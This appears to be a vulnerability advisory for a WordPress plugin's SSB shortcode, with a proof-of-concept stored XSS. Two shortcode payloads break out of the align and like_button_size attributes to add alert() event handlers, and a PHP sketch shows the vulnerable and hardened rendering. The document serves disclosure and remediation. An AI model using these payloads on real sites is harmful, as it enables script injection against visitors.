The plugin did not escape the align and like_button_size parameters of its SSB shortcode, which could allow users with a role as low as Contributor to perform Stored Cross-Site Scripting attacks.
[SSB align='" onmouseover="alert(/align/)//' like_button_size='4" onmouseover="alert(/like_button_size/)//']
[SSB align='" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//' like_button_size='4" style="animation-name:twentytwentyone-close-button-transition" onanimationend="alert(origin)//']
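The fix for this class of bug is to validate each shortcode attribute and escape it for the HTML attribute context before output. The sketch below is an added example, not the plugin's own code: the function names, the markup, the allowed align values and the 1-5 size range are assumptions, and htmlspecialchars() stands in for WordPress's esc_attr() so it runs outside WordPress.

```php
<?php
// Hypothetical shortcode renderer; markup, names and allowed values are
// assumptions for illustration, not taken from the plugin.

// Before: attribute values are concatenated into the HTML unescaped, so a
// double quote in the value closes the attribute and adds an event handler.
function ssb_render_vulnerable(array $atts): string {
    return '<div class="ssb" data-align="' . $atts['align'] . '">'
         . '<span data-size="' . $atts['like_button_size'] . '"></span></div>';
}

// After: constrain each value to what the feature needs, then escape on output.
function ssb_render_hardened(array $atts): string {
    $atts = array_merge(['align' => 'left', 'like_button_size' => '1'], $atts);

    // Allowlist: anything outside the known set falls back to the default.
    $allowed_align = ['left', 'center', 'right'];   // assumed value set
    $align = in_array($atts['align'], $allowed_align, true) ? $atts['align'] : 'left';

    // Numeric attribute: cast to int and clamp (range 1-5 is assumed).
    $size = (string) max(1, min(5, (int) $atts['like_button_size']));

    // Escape for attribute context even after validation (defence in depth).
    // Inside WordPress, call esc_attr() here instead.
    $esc = fn(string $v): string => htmlspecialchars($v, ENT_QUOTES | ENT_SUBSTITUTE, 'UTF-8');

    return '<div class="ssb" data-align="' . $esc($align) . '">'
         . '<span data-size="' . $esc($size) . '"></span></div>';
}

// Attribute values from the first proof of concept above.
$poc = [
    'align'            => '" onmouseover="alert(/align/)//',
    'like_button_size' => '4" onmouseover="alert(/like_button_size/)//',
];

echo ssb_render_vulnerable($poc), "\n"; // the onmouseover handlers end up in the markup
echo ssb_render_hardened($poc), "\n";   // align falls back to "left", size becomes "4"
```

The second proof of concept is neutralised the same way, since its style and onanimationend attributes also depend on breaking out of the quoted attribute value.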